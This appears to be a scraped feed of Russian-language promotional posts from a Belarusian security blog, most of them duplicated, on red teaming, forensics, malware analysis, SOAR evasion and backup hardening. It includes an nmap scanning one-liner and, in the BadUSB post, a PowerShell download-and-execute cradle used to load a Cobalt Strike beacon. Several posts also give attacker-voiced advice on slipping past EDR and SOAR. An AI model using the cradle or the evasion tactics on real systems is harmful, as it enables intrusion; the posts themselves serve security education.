ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
Как Red Team находит ваши персональные данные? 🔴
Вы уверены, что данные ваших клиентов и сотрудников в безопасности? Указ № 422 требует от всех белорусских компаний защищать персональные данные (ПДн), но как проверить, действительно ли ваша защита работает?
Ответ — Red Team операции. Это не просто сканирование уязвимостей, а полноценная симуляция атаки на вашу компанию с одной целью: найти и "украсть" конфиденциальную информацию.
Наша новая статья подробно разбирает весь процесс с точки зрения атакующего:
🕵️♂️ Фаза 1: Разведка (OSINT)
Изучаем соцсети сотрудников, GitHub и открытые серверы. Удивительно, что можно найти, даже не начав взлом.
🎣 Фаза 2: Проникновение
Фишинг, эксплуатация уязвимостей в веб-приложениях — мы покажем самые популярные векторы атак, которые до сих пор работают.
📂 Фаза 3: Поиск сокровищ
Где компании чаще всего "теряют" ПДн? Забытые Excel-файлы на сетевых дисках, старые бэкапы баз данных и неправильно настроенные облачные хранилища. Мы делимся скриптами на PowerShell и Bash для их поиска.
✈️ Фаза 4: Симуляция утечки (эксфильтрация)
Как атакующие незаметно выводят данные через DNS-туннели или обычные HTTPS-запросы, оставаясь невидимыми для ваших систем безопасности.
Почему это важно?
Реальная практика показывает: многие компании не готовы к целенаправленным атакам. Обнаруженные нами в ходе симуляций проблемы — от открытых баз данных до паролей в коде — обычное дело.
🔥 Хотите узнать, как защититься и какие инструменты используют "красные команды"?
➡️ Читать полную статью на сайте https://redsec.by/article/red-team-operacii-poisk-i-eksfiltraciya-personalnyh-dannyh-v-kontekste-ukaza-422/
Вы уверены, что данные ваших клиентов и сотрудников в безопасности? Указ № 422 требует от всех белорусских компаний защищать персональные данные (ПДн), но как проверить, действительно ли ваша защита работает?
Ответ — Red Team операции. Это не просто сканирование уязвимостей, а полноценная симуляция атаки на вашу компанию с одной целью: найти и "украсть" конфиденциальную информацию.
Наша новая статья подробно разбирает весь процесс с точки зрения атакующего:
🕵️♂️ Фаза 1: Разведка (OSINT)
Изучаем соцсети сотрудников, GitHub и открытые серверы. Удивительно, что можно найти, даже не начав взлом.
🎣 Фаза 2: Проникновение
Фишинг, эксплуатация уязвимостей в веб-приложениях — мы покажем самые популярные векторы атак, которые до сих пор работают.
📂 Фаза 3: Поиск сокровищ
Где компании чаще всего "теряют" ПДн? Забытые Excel-файлы на сетевых дисках, старые бэкапы баз данных и неправильно настроенные облачные хранилища. Мы делимся скриптами на PowerShell и Bash для их поиска.
✈️ Фаза 4: Симуляция утечки (эксфильтрация)
Как атакующие незаметно выводят данные через DNS-туннели или обычные HTTPS-запросы, оставаясь невидимыми для ваших систем безопасности.
Почему это важно?
Реальная практика показывает: многие компании не готовы к целенаправленным атакам. Обнаруженные нами в ходе симуляций проблемы — от открытых баз данных до паролей в коде — обычное дело.
🔥 Хотите узнать, как защититься и какие инструменты используют "красные команды"?
➡️ Читать полную статью на сайте https://redsec.by/article/red-team-operacii-poisk-i-eksfiltraciya-personalnyh-dannyh-v-kontekste-ukaza-422/
RedSec Daily
Red Team операции: Поиск и эксфильтрация персональных данных в контексте Указа № 422
Узнайте, как Red Team операции выявляют уязвимости в защите персональных данных в соответствии с Указом № 422. Методология, инструменты и реальные примеры.
🔥 Гайд по форензике: что делать при взломе, чтобы соответствовать требованиям ОАЦ
Статистика неумолима: Беларусь на 2-м месте в СНГ по числу кибератак. Когда инцидент произойдет у вас, времени на Google не будет. Сохраняйте этот пост и делитесь с коллегами.
Ключевое правило: «Золотой час»
Первый час после обнаружения — самый важный. Ваша цель — собрать летучие данные (volatile data) из оперативной памяти.
❌ ГЛАВНАЯ ОШИБКА: НЕ НАЖИМАЙТЕ "ЗАВЕРШЕНИЕ РАБОТЫ"!
Штатное выключение стирает RAM, временные файлы и сетевые подключения.
Порядок действий системного администратора:
1️⃣ Изоляция. Отключите сетевой кабель от сервера. Не выключайте Wi-Fi программно! Заблокируйте скомпрометированные учетки в AD.
2️⃣ Сбор дампа RAM. Это приоритет №1. Запустите с флешки FTK Imager или Belkasoft Live RAM Capturer и сохраните дамп памяти на внешний носитель. Внутри — запущенные процессы, сетевые подключения и даже пароли злоумышленника.
3️⃣ Сбор артефактов. Используйте утилиту KAPE для быстрого сбора логов, реестра, истории браузеров и метаданных MFT. Она сделает за 10 минут то, на что вручную уходят часы.
4️⃣ Создание образа диска. Только после сбора летучих данных! Выключите систему (выдернув шнур), подключите диск через аппаратный блокиратор записи (write blocker) и создайте полную копию с помощью FTK Imager.
5️⃣ Документирование. Фотографируйте экран, записывайте каждый шаг, время и хэш-суммы всех файлов. Это основа вашего отчета для ОАЦ.
Хотите узнать, как анализировать собранные данные с помощью Autopsy и Volatility, и получить готовый шаблон отчета?
https://redsec.by/article/cifrovaya-kriminalistika-dlya-vypolneniya-trebovanij-oac-poshagovoe-rukovodstvo-dlya-sistemnogo-administratora-i-ib-specialista/
Статистика неумолима: Беларусь на 2-м месте в СНГ по числу кибератак. Когда инцидент произойдет у вас, времени на Google не будет. Сохраняйте этот пост и делитесь с коллегами.
Ключевое правило: «Золотой час»
Первый час после обнаружения — самый важный. Ваша цель — собрать летучие данные (volatile data) из оперативной памяти.
❌ ГЛАВНАЯ ОШИБКА: НЕ НАЖИМАЙТЕ "ЗАВЕРШЕНИЕ РАБОТЫ"!
Штатное выключение стирает RAM, временные файлы и сетевые подключения.
Порядок действий системного администратора:
1️⃣ Изоляция. Отключите сетевой кабель от сервера. Не выключайте Wi-Fi программно! Заблокируйте скомпрометированные учетки в AD.
2️⃣ Сбор дампа RAM. Это приоритет №1. Запустите с флешки FTK Imager или Belkasoft Live RAM Capturer и сохраните дамп памяти на внешний носитель. Внутри — запущенные процессы, сетевые подключения и даже пароли злоумышленника.
3️⃣ Сбор артефактов. Используйте утилиту KAPE для быстрого сбора логов, реестра, истории браузеров и метаданных MFT. Она сделает за 10 минут то, на что вручную уходят часы.
4️⃣ Создание образа диска. Только после сбора летучих данных! Выключите систему (выдернув шнур), подключите диск через аппаратный блокиратор записи (write blocker) и создайте полную копию с помощью FTK Imager.
5️⃣ Документирование. Фотографируйте экран, записывайте каждый шаг, время и хэш-суммы всех файлов. Это основа вашего отчета для ОАЦ.
Хотите узнать, как анализировать собранные данные с помощью Autopsy и Volatility, и получить готовый шаблон отчета?
https://redsec.by/article/cifrovaya-kriminalistika-dlya-vypolneniya-trebovanij-oac-poshagovoe-rukovodstvo-dlya-sistemnogo-administratora-i-ib-specialista/
RedSec Daily
Цифровая криминалистика для выполнения требований ОАЦ: Пошаговое руководство для системного администратора и ИБ-специалиста
Пошаговое руководство по цифровой криминалистике для системных администраторов и ИБ-специалистов в Беларуси. Узнайте, как правильно реагировать на инциденты
🔴 Тебе подкинули "подарок"? Антивирус спит? 🔴
Стандартная ситуация: на тачке юзера лежит подозрительный файл, почтовый шлюз пропустил фишинговое вложение, а хваленый EDR молчит. Для большинства админов это паника и переустановка системы. Для нас — начало охоты.
Забудь про "волшебные кнопки". Настоящий анализ — это грязная ручная работа. Нужно препарировать зловреда, понять его логику, вытащить C2-сервера и собрать все индикаторы компрометации (IOC), чтобы заблокировать угрозу по всей сети.
Краткий план действий. Без воды, только мясо:
1️⃣ Статический анализ (смотрим под микроскопом, не запуская):
Вычисляем хэш (sha256sum). Первым делом прогоняем его через VirusTotal. Это базовая гигиена. Если хэш известный — половина работы сделана.
Утилита strings. Вытаскиваем из бинаря все текстовые кишки: URL, IP-адреса, пути к файлам, ключи реестра. Часто самое интересное лежит на поверхности.
PEStudio. Разбираем PE-заголовок на атомы. Смотрим импорты (что он вызывает из системных DLL), энтропию (привет, упаковщики!) и подозрительные секции. Сразу становится понятно, на что способен этот "пациент".
2️⃣ Динамический анализ (запускаем в клетке и смотрим шоу):
Изолированная VM. Твой личный полигон. Никогда, слышишь, НИКОГДА не запускай это на рабочей машине. Создай чистый снэпшот, а после анализа — откатись.
Procmon. Логгируем каждое действие малвари: какой файл создала, какой процесс запустила, в какой ключ реестра полезла. Ничто не скроется от твоего взора.
Wireshark + FakeNet-NG. Ловим и анализируем весь сетевой трафик. Смотрим, куда она стучится, какие данные сливает и откуда пытается скачать новые модули.
Итог:
Перестань быть жертвой. Умение анализировать малварь — это твой личный скилл, который отделяет профессионала от эникейщика. Это основа основ для любого, кто занимается реагированием на инциденты (DFIR) и проактивным поиском угроз (Threat Hunting).
🔥 Хочешь полное руководство со всеми командами, инструментами и реальными примерами?
Вся инфа от А до Я ждет тебя в нашей новой статье на сайте. Время прокачивать скиллы!
https://redsec.by/article/nam-podbrosili-zlovred-polnoe-rukovodstvo-po-bazovomu-analizu-vredonosnogo-po-svoimi-rukami/
Стандартная ситуация: на тачке юзера лежит подозрительный файл, почтовый шлюз пропустил фишинговое вложение, а хваленый EDR молчит. Для большинства админов это паника и переустановка системы. Для нас — начало охоты.
Забудь про "волшебные кнопки". Настоящий анализ — это грязная ручная работа. Нужно препарировать зловреда, понять его логику, вытащить C2-сервера и собрать все индикаторы компрометации (IOC), чтобы заблокировать угрозу по всей сети.
Краткий план действий. Без воды, только мясо:
1️⃣ Статический анализ (смотрим под микроскопом, не запуская):
Вычисляем хэш (sha256sum). Первым делом прогоняем его через VirusTotal. Это базовая гигиена. Если хэш известный — половина работы сделана.
Утилита strings. Вытаскиваем из бинаря все текстовые кишки: URL, IP-адреса, пути к файлам, ключи реестра. Часто самое интересное лежит на поверхности.
PEStudio. Разбираем PE-заголовок на атомы. Смотрим импорты (что он вызывает из системных DLL), энтропию (привет, упаковщики!) и подозрительные секции. Сразу становится понятно, на что способен этот "пациент".
2️⃣ Динамический анализ (запускаем в клетке и смотрим шоу):
Изолированная VM. Твой личный полигон. Никогда, слышишь, НИКОГДА не запускай это на рабочей машине. Создай чистый снэпшот, а после анализа — откатись.
Procmon. Логгируем каждое действие малвари: какой файл создала, какой процесс запустила, в какой ключ реестра полезла. Ничто не скроется от твоего взора.
Wireshark + FakeNet-NG. Ловим и анализируем весь сетевой трафик. Смотрим, куда она стучится, какие данные сливает и откуда пытается скачать новые модули.
Итог:
Перестань быть жертвой. Умение анализировать малварь — это твой личный скилл, который отделяет профессионала от эникейщика. Это основа основ для любого, кто занимается реагированием на инциденты (DFIR) и проактивным поиском угроз (Threat Hunting).
🔥 Хочешь полное руководство со всеми командами, инструментами и реальными примерами?
Вся инфа от А до Я ждет тебя в нашей новой статье на сайте. Время прокачивать скиллы!
https://redsec.by/article/nam-podbrosili-zlovred-polnoe-rukovodstvo-po-bazovomu-analizu-vredonosnogo-po-svoimi-rukami/
RedSec Daily
Нам подбросили "зловред": Полное руководство по базовому анализу вредоносного ПО своими руками
Узнайте, как провести базовый анализ вредоносного ПО своими руками. Наше пошаговое руководство поможет оценить угрозу, извлечь IOC и защитить вашу сеть.
Blue Team спит. Скрипты работают. 💀
Пока "синие" пьют утренний кофе и смотрят в дашборды своего SIEM, твой код должен бесшумно обходить периметр. Ручная работа — удел дилетантов. Профессионалы пишут инструменты под себя.
Забудь про готовые комбайны. Они шумят, оставляют тонны следов и предсказуемы для любой EDR. Твой собственный сканер на Python/Go — это призрак в сети. Он делает только то, что нужно. Никаких лишних пакетов, никаких стандартных юзер-агентов.
Простой пример: пока nmap молотит по всем портам, твой скрипт может сначала собрать открытые порты через masscan, а потом точечно, с кастомными задержками, опрашивать только их, мимикрируя под легитимный трафик.
Истина: Системы защиты рассчитаны на известные инструменты. Стань неизвестным. Твой код — твоё главное оружие. Если ты не пишешь свои тулзы, ты просто ещё один скрипт-кидди, играющий чужими игрушками.
https://redsec.by/article/sozdanie-sobstvennyh-instrumentov-avtomatizaciya-dlya-pentestera-i-administratora-na-python-i-powershell/
Пока "синие" пьют утренний кофе и смотрят в дашборды своего SIEM, твой код должен бесшумно обходить периметр. Ручная работа — удел дилетантов. Профессионалы пишут инструменты под себя.
Забудь про готовые комбайны. Они шумят, оставляют тонны следов и предсказуемы для любой EDR. Твой собственный сканер на Python/Go — это призрак в сети. Он делает только то, что нужно. Никаких лишних пакетов, никаких стандартных юзер-агентов.
Простой пример: пока nmap молотит по всем портам, твой скрипт может сначала собрать открытые порты через masscan, а потом точечно, с кастомными задержками, опрашивать только их, мимикрируя под легитимный трафик.
Истина: Системы защиты рассчитаны на известные инструменты. Стань неизвестным. Твой код — твоё главное оружие. Если ты не пишешь свои тулзы, ты просто ещё один скрипт-кидди, играющий чужими игрушками.
https://redsec.by/article/sozdanie-sobstvennyh-instrumentov-avtomatizaciya-dlya-pentestera-i-administratora-na-python-i-powershell/
RedSec Daily
Создание собственных инструментов: Автоматизация для пентестера и администратора на Python и PowerShell
Профессиональное руководство по автоматизации задач кибербезопасности. Создайте свои инструменты для пентеста и администрирования на Python и PowerShell.
SOAR: Их новый автоматизированный цербер. Учимся обходить.
Замечал, что твои IoC стали отлетать быстрее? Что хост уходит в изоляцию через 5 минут после заражения, а не через 5 часов? Поздравляю, скорее всего, ты столкнулся с SOAR.
"Синие" перестали кликать мышкой. Теперь за них работает робот.
Что это такое, на нашем языке:
SOAR (Security Orchestration, Automation, Response) — это скрипт-переросток, который они натравили на свои SIEM, EDR и файрволы.
Оркестровка: Их зоопарк тулзов (SIEM, EDR, TI-фиды) теперь работает как единое целое. Алерт из SIEM триггерит действие в EDR.
Автоматизация: Рутинные задачи, которые раньше делал сонный аналитик, теперь выполняет машина. 24/7. Без кофе-брейков.
Как выглядит твой провал на их стороне (типичный плейбук):
Триггер: Твой фишинговый домен спалился в SIEM. Алерт улетает в SOAR.
Обогащение: SOAR мгновенно пробивает твой домен, IP и хеш файла по всем доступным Threat Intelligence базам. Твои свежезареганные домены уже не такие свежие.
Реакция:
Домен и IP летят в бан на прокси и почтовом шлюзе.
Письмо удаляется из ящиков всех, кто его получил.
Если кто-то кликнул — EDR получает команду изолировать хост от сети.
Учётка юзера блокируется в AD.
Весь этот цикл занимает 2-5 минут. Пока ты ждешь шелл, тебя уже выкинули из сети.
Что делать:
Скорость: Твои действия после компрометации должны быть быстрее их автоматизации.
Бесшумность: Минимизируй количество артефактов. Используй легитимные сервисы (Living off the Land). SOAR работает по четким индикаторам. Нет индикаторов — нет реакции.
Диверсификация: Используй разную инфраструктуру. Если один домен сожгли, должен быть готов второй.
Запомни: ты воюешь не с человеком, а с алгоритмом. Думай, как его обмануть.
https://redsec.by/article/soar-platformy-na-sluzhbe-ib-kak-robotizirovat-reagirovanie-na-incidenty-i-pobedit-rutinu/
Замечал, что твои IoC стали отлетать быстрее? Что хост уходит в изоляцию через 5 минут после заражения, а не через 5 часов? Поздравляю, скорее всего, ты столкнулся с SOAR.
"Синие" перестали кликать мышкой. Теперь за них работает робот.
Что это такое, на нашем языке:
SOAR (Security Orchestration, Automation, Response) — это скрипт-переросток, который они натравили на свои SIEM, EDR и файрволы.
Оркестровка: Их зоопарк тулзов (SIEM, EDR, TI-фиды) теперь работает как единое целое. Алерт из SIEM триггерит действие в EDR.
Автоматизация: Рутинные задачи, которые раньше делал сонный аналитик, теперь выполняет машина. 24/7. Без кофе-брейков.
Как выглядит твой провал на их стороне (типичный плейбук):
Триггер: Твой фишинговый домен спалился в SIEM. Алерт улетает в SOAR.
Обогащение: SOAR мгновенно пробивает твой домен, IP и хеш файла по всем доступным Threat Intelligence базам. Твои свежезареганные домены уже не такие свежие.
Реакция:
Домен и IP летят в бан на прокси и почтовом шлюзе.
Письмо удаляется из ящиков всех, кто его получил.
Если кто-то кликнул — EDR получает команду изолировать хост от сети.
Учётка юзера блокируется в AD.
Весь этот цикл занимает 2-5 минут. Пока ты ждешь шелл, тебя уже выкинули из сети.
Что делать:
Скорость: Твои действия после компрометации должны быть быстрее их автоматизации.
Бесшумность: Минимизируй количество артефактов. Используй легитимные сервисы (Living off the Land). SOAR работает по четким индикаторам. Нет индикаторов — нет реакции.
Диверсификация: Используй разную инфраструктуру. Если один домен сожгли, должен быть готов второй.
Запомни: ты воюешь не с человеком, а с алгоритмом. Думай, как его обмануть.
https://redsec.by/article/soar-platformy-na-sluzhbe-ib-kak-robotizirovat-reagirovanie-na-incidenty-i-pobedit-rutinu/
RedSec Daily
SOAR-платформы на службе ИБ: Как роботизировать реагирование на инциденты и победить рутину
Узнайте, что такое SOAR-платформы и как они автоматизируют реагирование на инциденты. Разбор реального сценария, преимущества и сложности внедрения технологии.
Тот самый момент, когда видишь в отчете по безопасности пункт
"Контроль USB-носителей: ✅ выполнено". Сразу понимаешь — вход будет легким. 😉
Они тратят миллионы 💰 на DLP и пишут GPO, чтобы заблокировать Mass Storage Class. Это так мило. Они думают, что защитились от утечек 📁. А мы не собираемся ничего копировать.
Мы собираемся отдавать команды. ⚡️
Берется Raspberry Pi Pico за $10. Заливается DuckyScript 🦆. Полезная нагрузка — однострчный PowerShell для загрузки маяка Cobalt Strike 📡.
— вы знаете эту классику.
Устройство летит на парковку 🚗 или в курилку. Любопытный сотрудник 🧑💼 подбирает "флешку". Вставляет 🔌.
Что происходит дальше:
1️⃣ Их DLP спит 💤.
2️⃣ Их EDR видит... новую клавиатуру. 👁➡️⌨️
Пока система думает, HID-эмулятор уже ввел пейлоад.
⏱️ Через 3 секунды у меня в консоли новый бикон.
Итог: RCE внутри периметра. 💥
Их политика безопасности рассчитана на бухгалтера с вирусом. Наша атака — на фундаментальное доверие ОС к устройствам ввода. Они заблокировали дверь для файлов 🚪, пока мы заходим через окно для команд 🖼.
Их галочка в чек-листе — наше приглашение.
https://redsec.by/article/illyuziya-kontrolya-pochemu-blokirovka-usb-nakopitelej-eto-ne-bezopasnost/
"Контроль USB-носителей: ✅ выполнено". Сразу понимаешь — вход будет легким. 😉
Они тратят миллионы 💰 на DLP и пишут GPO, чтобы заблокировать Mass Storage Class. Это так мило. Они думают, что защитились от утечек 📁. А мы не собираемся ничего копировать.
Мы собираемся отдавать команды. ⚡️
Берется Raspberry Pi Pico за $10. Заливается DuckyScript 🦆. Полезная нагрузка — однострчный PowerShell для загрузки маяка Cobalt Strike 📡.
(new-object net.webclient).downloadstring(...) | iex
— вы знаете эту классику.
Устройство летит на парковку 🚗 или в курилку. Любопытный сотрудник 🧑💼 подбирает "флешку". Вставляет 🔌.
Что происходит дальше:
1️⃣ Их DLP спит 💤.
2️⃣ Их EDR видит... новую клавиатуру. 👁➡️⌨️
Пока система думает, HID-эмулятор уже ввел пейлоад.
⏱️ Через 3 секунды у меня в консоли новый бикон.
Итог: RCE внутри периметра. 💥
Их политика безопасности рассчитана на бухгалтера с вирусом. Наша атака — на фундаментальное доверие ОС к устройствам ввода. Они заблокировали дверь для файлов 🚪, пока мы заходим через окно для команд 🖼.
Их галочка в чек-листе — наше приглашение.
https://redsec.by/article/illyuziya-kontrolya-pochemu-blokirovka-usb-nakopitelej-eto-ne-bezopasnost/
RedSec Daily
Иллюзия контроля: почему блокировка USB-накопителей — это не безопасность
Почему блокировка USB-накопителей не защищает от реальных угроз. Разбор атак BadUSB (HID) и построение многоуровневой системы защиты с помощью EDR и GPO
Пока вы тешите себя иллюзиями, что «нас ломать не будут, мы никому не нужны», я уже вижу ваши торчащие RDP наружу на Shodan и пароли от админок в утечках пятилетней давности.
Давайте честно: построить нормальный отдел ИБ в Беларуси — это тот еще квест. С одной стороны, давят регуляторы (ОАЦ, персданные), с другой — бизнес жмется на бюджеты и верит, что системный админ Вася в перерывах между эникейством защитит периметр от APT-группировки. Спойлер: не защитит. Я зайду в вашу сеть быстрее, чем Вася допьет свой утренний кофе.
Накатал подробный мануал, как выстроить оборону с нуля и не слить бюджет в унитаз на бесполезные «коробки». Без маркетинговой шелухи, чисто по хардкору и реалиям рынка.
Разложил по фактам:
💀 Почему нельзя подчинять безопасников IT-директору (это прямой путь к инциденту).
💀 Кого нанимать: почему юрист, инженер и аналитик — это не может быть один человек, даже если очень хочется сэкономить.
💀 Цифры: сколько реально стоит защита в 2025 году, и почему аутсорс SOC дешевле, чем строить свой звездолет.
💀 Как продать идею безопасности боссу, которому плевать на все, кроме прибыли.
Если не хотите, чтобы завтра ваша база клиентов гуляла по даркнету, а вы судорожно искали крипту для выкупа шифровальщика — читать обязательно. Это база, на которой держится ваше выживание.
https://redsec.by/article/kak-postroit-otdel-ib-s-nulya-v-belorusskoj-kompanii-poshagovoe-rukovodstvo-dlya-rukovoditelej/
Давайте честно: построить нормальный отдел ИБ в Беларуси — это тот еще квест. С одной стороны, давят регуляторы (ОАЦ, персданные), с другой — бизнес жмется на бюджеты и верит, что системный админ Вася в перерывах между эникейством защитит периметр от APT-группировки. Спойлер: не защитит. Я зайду в вашу сеть быстрее, чем Вася допьет свой утренний кофе.
Накатал подробный мануал, как выстроить оборону с нуля и не слить бюджет в унитаз на бесполезные «коробки». Без маркетинговой шелухи, чисто по хардкору и реалиям рынка.
Разложил по фактам:
💀 Почему нельзя подчинять безопасников IT-директору (это прямой путь к инциденту).
💀 Кого нанимать: почему юрист, инженер и аналитик — это не может быть один человек, даже если очень хочется сэкономить.
💀 Цифры: сколько реально стоит защита в 2025 году, и почему аутсорс SOC дешевле, чем строить свой звездолет.
💀 Как продать идею безопасности боссу, которому плевать на все, кроме прибыли.
Если не хотите, чтобы завтра ваша база клиентов гуляла по даркнету, а вы судорожно искали крипту для выкупа шифровальщика — читать обязательно. Это база, на которой держится ваше выживание.
https://redsec.by/article/kak-postroit-otdel-ib-s-nulya-v-belorusskoj-kompanii-poshagovoe-rukovodstvo-dlya-rukovoditelej/
RedSec Daily
Как построить отдел ИБ с нуля в белорусской компании: пошаговое руководство для руководителей
Пошаговое руководство по созданию отдела информационной безопасности в белорусской компании. Разбор ролей, бюджетов, требований регуляторов (ОАЦ, НЦЗПД)
🔥 Хватит быть "сторожем". Пора становиться тем, от кого охраняют.
Если ты годами настраиваешь Active Directory, поднимаешь сети и пишешь скрипты на PowerShell для автоматизации рутины — у меня для тебя новость. Ты сидишь на сундуке с золотом, но продолжаешь работать за еду.
Системный администратор — это самый опасный кандидат в Red Team. В отличие от курсантов, которые выучили пару команд в Metasploit, ты понимаешь физику процессов. Ты знаешь, как строится дом, а значит, интуитивно чувствуешь, где строители схалтурили.
Я подготовил подробный разбор карьерного транзита SysAdmin -> Red Teamer в реалиях белорусского рынка. Без инфоцыганства и сказок про "миллион сразу", только техническая фактура.
В статье разобрал:
💀 Смена майндсета: Как перестать латать дыры и начать их эксплуатировать. Почему твой идеальный GPO — это моя точка входа.
🛠 Технический стек: Почему тебе срочно нужен BloodHound и Impacket, и как превратить админский PowerShell в weaponized-скрипты.
📜 Сертификация: Что реально котируется в РБ и мире. Почему CRTP для админа полезнее, чем распиаренный CEH.
💰 Рынок и цифры: Реальные вилки зарплат в Минске, требования ОАЦ и где искать вакансии.
🏠 Home Lab: Готовая схема домашнего полигона, чтобы тренировать атаки на AD (Kerberoasting, DCSync) без риска сесть по 354 УК РБ.
Рынок Offensive Security в Беларуси сейчас — это непаханое поле. Компании ищут инженеров, а не скрипт-кидди. Твой опыт — твой главный эксплойт. Используй его.
🔗 Читать полный гайд: https://redsec.by/article/karernyj-tranzit-kak-sistemnomu-administratoru-stat-red-teamerom-v-belarusi-polnyj-gajd/
Если ты годами настраиваешь Active Directory, поднимаешь сети и пишешь скрипты на PowerShell для автоматизации рутины — у меня для тебя новость. Ты сидишь на сундуке с золотом, но продолжаешь работать за еду.
Системный администратор — это самый опасный кандидат в Red Team. В отличие от курсантов, которые выучили пару команд в Metasploit, ты понимаешь физику процессов. Ты знаешь, как строится дом, а значит, интуитивно чувствуешь, где строители схалтурили.
Я подготовил подробный разбор карьерного транзита SysAdmin -> Red Teamer в реалиях белорусского рынка. Без инфоцыганства и сказок про "миллион сразу", только техническая фактура.
В статье разобрал:
💀 Смена майндсета: Как перестать латать дыры и начать их эксплуатировать. Почему твой идеальный GPO — это моя точка входа.
🛠 Технический стек: Почему тебе срочно нужен BloodHound и Impacket, и как превратить админский PowerShell в weaponized-скрипты.
📜 Сертификация: Что реально котируется в РБ и мире. Почему CRTP для админа полезнее, чем распиаренный CEH.
💰 Рынок и цифры: Реальные вилки зарплат в Минске, требования ОАЦ и где искать вакансии.
🏠 Home Lab: Готовая схема домашнего полигона, чтобы тренировать атаки на AD (Kerberoasting, DCSync) без риска сесть по 354 УК РБ.
Рынок Offensive Security в Беларуси сейчас — это непаханое поле. Компании ищут инженеров, а не скрипт-кидди. Твой опыт — твой главный эксплойт. Используй его.
🔗 Читать полный гайд: https://redsec.by/article/karernyj-tranzit-kak-sistemnomu-administratoru-stat-red-teamerom-v-belarusi-polnyj-gajd/
RedSec Daily
Карьерный транзит: Как системному администратору стать Red Teamer’ом в Беларуси. Полный гайд
Подробный гайд по переходу из системного администратора в Red Team в Беларуси. Скрипты PowerShell, примеры атак, настройка Home Lab, таблица сертификатов (OSCP, eJPT)
Периметр дырявый. WAF обходится. Пароли брутятся или утекают через фишинг. Как Red Teamer скажу прямо: если до твоего порта можно достучаться по сети — это уже моя территория. Единственное, что я не могу взломать удаленно через эксплойт или RCE — это физику.
Написал подробный мануал по созданию «Цифрового бункера».
Строим архитектуру резервного копирования, которую невозможно скомпрометировать без физического присутствия администратора.
Что внутри:
💀 Hardware Auth: Харденинг SSH до параноидального уровня. Вход только по ключу Ed25519, который лежит на USB-токене. Нет флешки в порту — нет коннекта.
💀 Zero Knowledge: Сервер бэкапов принимает данные, но не может их прочитать. Client-side encryption решает.
💀 Stack: Связка Debian + Proxmox Backup Server + Restic.
💀 Defense: Защита от шифровальщиков и кражи «железа». Если сервер вынесут из офиса, внутри найдут только цифровой шум.
Это не просто «настройка бэкапов». Это полное отрезание вектора атаки Lateral Movement.
Читать гайд: https://redsec.by/article/stroim-cifrovoj-bunker-udalennyj-dostup-po-fizicheskomu-klyuchu-i-zero-knowledge-bekapy/
Написал подробный мануал по созданию «Цифрового бункера».
Строим архитектуру резервного копирования, которую невозможно скомпрометировать без физического присутствия администратора.
Что внутри:
💀 Hardware Auth: Харденинг SSH до параноидального уровня. Вход только по ключу Ed25519, который лежит на USB-токене. Нет флешки в порту — нет коннекта.
💀 Zero Knowledge: Сервер бэкапов принимает данные, но не может их прочитать. Client-side encryption решает.
💀 Stack: Связка Debian + Proxmox Backup Server + Restic.
💀 Defense: Защита от шифровальщиков и кражи «железа». Если сервер вынесут из офиса, внутри найдут только цифровой шум.
Это не просто «настройка бэкапов». Это полное отрезание вектора атаки Lateral Movement.
Читать гайд: https://redsec.by/article/stroim-cifrovoj-bunker-udalennyj-dostup-po-fizicheskomu-klyuchu-i-zero-knowledge-bekapy/
RedSec Daily
Строим цифровой бункер: Удаленный доступ по физическому ключу и Zero-Knowledge бэкапы
остройте цифровой бункер: настройка удаленного доступа строго по USB-ключу и шифрованных бэкапов (Proxmox, Restic). Полный гайд по Zero Knowledge защите.